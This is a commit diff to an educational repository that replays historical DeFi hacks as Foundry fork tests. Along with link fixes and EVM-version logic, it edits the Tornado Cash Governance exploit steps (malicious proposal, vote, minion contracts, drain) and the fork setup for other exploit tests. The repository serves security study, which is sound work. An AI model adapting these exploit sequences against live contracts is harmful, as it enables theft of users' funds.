Repo maintenance (#100)

* chore: dynamically set EVM version and fix typos

* fix(test): correct time logic in TornadoCash_Governance attack

* fix: point to the correct folder

Author: pinalikefruit

README.md

@@ -56,13 +56,13 @@ The full list is below:
 - [Vesper Rari Pool - Nov 2021 - (~$3MM) - Price Feed Manipulation](/test/Business_Logic/VesperRariFuse)
 - [Uranium - Apr 2021 - (~$50MM) - Wrong Constant Product AMM checks](/test/Business_Logic/Uranium)
 - [Furucombo - Feb 2021 - ($15MM) - DELEGATECALL to proxy](/test/Business_Logic/Furucombo)
-- [Seaman - Nov 2022 - ($7K) - Sandwich attack](/test/Business_Logic/Furucombo)
+- [Seaman - Nov 2022 - ($7K) - Sandwich attack](/test/Business_Logic/Seaman/)
 - [Tornado Cash Governance - May 2023 - (~$2.7MM) - Malicious Proposal](/test/Business_Logic/TornadoCash_Governance)
 - [Onyx Protocol - Nov 2023 - (~$2.1MM) - Empty Market Manipulation / Rounding Error](/test/Business_Logic/OnyxProtocol)
 - [Polter Finance - Nov 2024 - (~$8.7MM) - Oracle Manipulation](/test/Business_Logic/Polter_Finance/)
 - [SIR Trading - Mar 2025 - (~$355k) - Bad Usage of Transient Storage](/test/Business_Logic/SIRTrading/)
 - [MobiusDAO - Mar 2025 - (~$2.15MM) - Bad Arithmetic](/test/Business_Logic/MobiusDAO/)
-- [Cork Finance - May 2025 - (~$7.2MM) - Price Manipulation + Poor Access Control](/test/Business_Logic/FourMeme/)
+- [Cork Finance - May 2025 - (~$7.2MM) - Price Manipulation + Poor Access Control](/test/Business_Logic/Cork_Finance/)
 
 
 ### Reentrancy

scripts/attach-run.sh

@@ -1,5 +1,11 @@
 #!/usr/bin/env bash
 set -euo pipefail
+# Configuration block number
+LONDON_BLOCK=12965000  
+PARIS_BLOCK=15537394
+SHANGHAI_BLOCK=17034870
+CANCUN_BLOCK=19426587
+PETRA_BLOCK=22431084
 
 # Ensure Foundry is on PATH for non-interactive shells (like VS Code hooks)
 export PATH="$PATH:$HOME/.foundry/bin"
@@ -37,9 +43,33 @@ else
   echo "Using saved RPC_URL (…${RPC_URL: -6})"
 fi
 
-printf "\n▶ Running exploit: %s\n\n" "$LEARN_ATTACK_CONTRACT"
-forge test --match-contract "$LEARN_ATTACK_CONTRACT" -vvv
+ATTACK_FILE_PATH=$(grep -rl "contract ${LEARN_ATTACK_CONTRACT}\b" ./test | head -n 1)
 
+if [ -n "$ATTACK_FILE_PATH" ]; then
+    TEST_DIR=$(dirname "$ATTACK_FILE_PATH")
+    README_PATH="${TEST_DIR}/README.md"
+    if [ -f "$README_PATH" ]; then
+        if grep 'network:' "$README_PATH" | grep -qv 'ethereum'; then
+            EVM_VERSION="london"
+        else
+            ATTACK_BLOCK=$(grep -A 2 'attack_block:' "$README_PATH" | grep -o '[0-9]\+' | head -n 1 || true)
+            ATTACK_BLOCK=${ATTACK_BLOCK:-0}
+            if [ -n "$ATTACK_BLOCK" ]; then
+                if (( ATTACK_BLOCK < LONDON_BLOCK )); then EVM_VERSION="berlin";
+                elif (( ATTACK_BLOCK < PARIS_BLOCK )); then EVM_VERSION="london";
+                elif (( ATTACK_BLOCK < SHANGHAI_BLOCK )); then EVM_VERSION="paris";
+                elif (( ATTACK_BLOCK < CANCUN_BLOCK )); then EVM_VERSION="shanghai";
+                elif (( ATTACK_BLOCK < PETRA_BLOCK )); then EVM_VERSION="cancun";
+                else EVM_VERSION="prague";fi;
+                EVM_VERSION_FLAG="--evm-version $EVM_VERSION"
+                echo "Using EVM Version: $EVM_VERSION"
+            fi
+        fi
+    fi
+fi
+
+printf "\n▶ Running exploit: %s\n\n" "$LEARN_ATTACK_CONTRACT"
+forge test --match-contract "$LEARN_ATTACK_CONTRACT" -vvv --evm-version "$EVM_VERSION"
 echo
 echo "✅ Done. Opening interactive shell..."
 exec bash -l

test/Bad_Data_Validation/Bond_OlympusDAO/README.md

@@ -17,7 +17,7 @@ attacker_addresses:
     - "0xa29e4fe451ccfa5e7def35188919ad7077a4de8f"
 malicious_token: []
 attack_block: [15794364]
-reproduction_command: forge test --match-contract Exploit_OlympusDAO -vvv
+reproduction_command: forge test --match-contract Exploit_OlympusDao -vvv
 attack_txs:
     - "0x3ed75df83d907412af874b7998d911fdf990704da87c2b1a8cf95ca5d21504cf"
 sources:

test/Bridges/NomadBridge/README.md

@@ -2,7 +2,7 @@
 title: Nomad Bridge
 description: Processing arbitrary messages through faulty validation logic
 type: Exploit
-network: [ethereum, moonbean]
+network: [ethereum, moonbeam]
 date: 2022-08-01
 loss_usd: 190000000
 returned_usd: 0

test/Bridges/PolyNetworkBridge/README.md

@@ -2,7 +2,7 @@
 title: Polynetwork Bridge
 description: Hijacking validator roles through sighash collision attacks
 type: Exploit
-network: [ethereum, moonbean]
+network: [ethereum, moonbeam]
 date: 2021-08-10
 loss_usd: 611000000
 returned_usd: 578000000

test/Business_Logic/FourMeme/README.md

@@ -41,7 +41,7 @@ sources:
 
 ## Detailed Description
 
-[four.meme]() is a memecoin launchpad on the BNB Smart Chain, similar to [pump.fun](). This platform operates in three main steps:
+[four.meme](https://four.meme/) is a memecoin launchpad on the BNB Smart Chain, similar to [pump.fun](https://pump.fun/). This platform operates in three main steps:
 
 1. **Creation**: Users customize the name, logo, description, and optional social accounts to generate a new memecoin.
 2. **Trading**: Other users can trade the memecoin directly on the platform.
@@ -59,4 +59,4 @@ The core issue originates from four.meme's contract [0x5c95](https://bscscan.com
 
 ## Possible mitigations
 
-To mitigate this attack, [four.meme]() should have set appropriate `amount0Min` and `amount1Min` values when adding liquidity to the pool.
+To mitigate this attack, [four.meme](https://four.meme/) should have set appropriate `amount0Min` and `amount1Min` values when adding liquidity to the pool.

test/Business_Logic/OneRingFinance/OneRingFinance.attack.sol

@@ -108,7 +108,7 @@ contract Exploit_OneRingFinance is TestHarness, TokenBalanceTracker {
     uint256 borrowAmount;
 
     function setUp() external {
-        cheat.createSelectFork('fantom', 34041499); // We pin one block before the exploit happened.
+        cheat.createSelectFork(vm.envString("RPC_URL"), 34041499); // We pin one block before the exploit happened.
 
         cheat.deal(address(this), 0);
 

test/Business_Logic/TornadoCash_Governance/TornadoCash_Governance.attack.sol

@@ -61,7 +61,7 @@ contract Exploit_TornadoCashGovernance is TestHarness, TokenBalanceTracker {
         // 1. Submit the proposal #20 allegating some relayers are cheating the protocol with the
         // Attacker 2
         // https://explorer.phalcon.xyz/tx/eth/0x34605f1d6463a48b818157f7b26d040f8dd329273702a0618e9e74fe350e6e0d?line=0&debugLine=0
-        vm.rollFork(17_249_552);
+        vm.roll(17_249_552);
         console2.log("Submitting proposal...");
         vm.startPrank(ATTACKER2);
         proposalId = TORNADO_GOVERNANCE.propose(
@@ -72,16 +72,17 @@ contract Exploit_TornadoCashGovernance is TestHarness, TokenBalanceTracker {
 
         console2.log("\n======== STAGE 1.1 VOTE PROPOSAL ========");
         console2.log("Locking funds with voter...");
-        cheat.rollFork(17_265_000);
+        cheat.roll(17_265_000);
         deal(address(tornToken), SomeVoter, 300_000 ether);
         assertEq(tornToken.balanceOf(SomeVoter), 300_000 ether, "Voter: torn token balance mismatch");
         vm.startPrank(SomeVoter);
         tornToken.approve(address(TORNADO_GOVERNANCE), type(uint256).max);
         TORNADO_GOVERNANCE.lockWithApproval(tornToken.balanceOf(SomeVoter));
         console2.log("Funds successfully locked \n");
 
-        cheat.rollFork(17_275_000);
         console2.log("Casting vote...");
+        (,, uint256 startTime, uint256 endTime,,,,) = TORNADO_GOVERNANCE.proposals(proposalId);
+        vm.warp(startTime + 1);
         TORNADO_GOVERNANCE.castVote(proposalId, true);
         console2.log("Vote successfully casted");
         vm.stopPrank();
@@ -90,7 +91,7 @@ contract Exploit_TornadoCashGovernance is TestHarness, TokenBalanceTracker {
         // 2. Deploy multiple minion contracts with the Attacker Contract and lock zero TORN with
         // each one in the Governance with the Attacker 1
         // https://explorer.phalcon.xyz/tx/eth/0x26672ad9140d11b64964e79d0ed5971c26492786cfe0edf57034229fdc7dc529?line=835&debugLine=835
-        cheat.rollFork(17_285_354);
+        cheat.roll(17_285_354);
         vm.startPrank(ATTACKER1);
         attacker1contract = new Attacker1Contract();
         attacker1contract.deployMultipleContracts(5);
@@ -107,7 +108,7 @@ contract Exploit_TornadoCashGovernance is TestHarness, TokenBalanceTracker {
         destroyAccount(address(proposal_20), address(0));
         destroyAccount(address(transientContract), ATTACKER2);
 
-        vm.rollFork(17_299_106);
+        vm.roll(17_299_106);
         console2.log("Fork Block Number: %s", block.number); // just before the redeployment
 
         console2.log("\n======== STAGE 4. REDEPLOY THE PROPOSAL AND TRANSIENT ========");
@@ -126,8 +127,11 @@ contract Exploit_TornadoCashGovernance is TestHarness, TokenBalanceTracker {
         console2.log("Proposal: %s", address(transientContract).code.length);
 
         console2.log("\n======== STAGE 5. EXECUTE MALICIOUS PROPOSAL ========");
-        cheat.rollFork(17_299_138); // just before the execution
+        
         console2.log("Executing malicious proposal...");
+        (,,, endTime,,,,) = TORNADO_GOVERNANCE.proposals(proposalId);
+        uint256 EXECUTION_DELAY = 172800;
+        vm.warp(endTime + EXECUTION_DELAY+ 1);
         // 5. Execute the malicious proposal in Tornado closing the position of 4 Relayers (the same
         // mentioned in the proposal #20 description)
         // https://explorer.phalcon.xyz/tx/eth/0x3274b6090685b842aca80b304a4dcee0f61ef8b6afee10b7c7533c32fb75486d?line=3&debugLine=3
@@ -148,7 +152,7 @@ contract Exploit_TornadoCashGovernance is TestHarness, TokenBalanceTracker {
         // https://explorer.phalcon.xyz/tx/eth/0x13e2b7359dd1c13411342fd173750a19252f5b0d92af41be30f9f62167fc5b94?line=12&debugLine=12
         // The locked balance slots were wrote with 10,000e18 granting that amount of tokens per account
         // This call is made with a for loop over all the minions.
-        cheat.rollFork(17_304_425); // just before the drain
+        cheat.roll(17_304_425); // just before the drain
         address[] memory minions = attacker1contract.getMinions();
 
         console2.log("Before Drain ");

test/Business_Logic/TornadoCash_Governance/TornadoGovernance.interface.sol

@@ -74,4 +74,14 @@ interface ITornadoGovernance {
     function lockedBalance(address from) external returns (uint256);
     function state(uint256 proposalId) external view returns (ProposalState);
     function castVote(uint256 proposalId, bool support) external;
+    function proposals(uint256 proposalId) external view returns (
+        address proposer,
+        address target,
+        uint256 startTime,
+        uint256 endTime,
+        uint256 forVotes,
+        uint256 againstVotes,
+        bool executed,
+        bool extended
+);
 }

test/Reentrancy/HundredFinance/HundredFinance.attack.sol

@@ -25,7 +25,7 @@ contract Exploit_HundredFinance is TestHarness {
     uint16 timesBorrowed;
 
     function setUp() external {
-        cheat.createSelectFork("gnosis", 21120319); // We pin one block before the exploit happened.
+        cheat.createSelectFork(vm.envString("RPC_URL"), 21120319); // We pin one block before the exploit happened.
     }
 
     receive() external payable {